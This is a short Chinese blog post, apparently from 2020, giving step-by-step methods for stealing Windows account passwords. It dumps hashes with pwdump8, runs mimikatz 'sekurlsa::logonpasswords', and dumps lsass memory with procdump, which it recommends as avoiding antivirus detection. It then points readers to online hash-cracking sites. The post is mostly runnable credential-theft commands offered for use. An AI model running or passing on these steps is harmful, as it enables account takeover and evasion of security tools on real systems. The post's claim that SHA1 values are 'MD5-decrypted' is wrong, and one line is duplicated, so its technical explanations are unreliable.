Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系统下hash密码格式用户名称:RID:LM-HASH值:NT-HASH值。
1、利用 pwdump8 获取密码 软件地址:https://www.openwall.com/passwords/windows-pwdump
1、利用 pwdump8 获取密码 软件地址:https://www.openwall.com/passwords/windows-pwdump
管理员权限运行cmd,获取加密后的NT-HASH 登陆网站破解
例如:
Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040
用户名称为:Administrator
RID为:500
LM-HASH值为:AF01DF70036EBACFAAD3B435B51404EE
NT-HASH值为:44F077E27F6FEF69E7BD834C7242B040
hash在线破解网站
MD5解码网站
2、利用 mimikatz 获取明文密码
privilege::debug
sekurlsa::logonpasswords
获取的SHA1为加密后的密码,该加密字段进行md5解密即可,存在空密码的用户也会抓取到一盒哈希值,将该sha1解密后其实是个空字段
3、利用 procdump & mimikatz 获取密码(推荐 不报毒)
以管理员身份运行cmd,利用procdump导出lsass进程文件
procdump.exe -accepteula -ma lsass
导出结束后,把lsass.dmp文件复制到mimikatz运行目录下,执行以下命令,利用mimikatz读出内容
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords
获取的SHA1为加密后的密码,然后进行md5解密
procdump下载地址
mimikatz下载地址
版权声明:《 Windows下获取账户密码明文技巧 》为IT-mes原创文章,转载请注明出处!
最后编辑:2020-11-9 06:11:18
2020-11-11 08:11
2020-11-11 08:10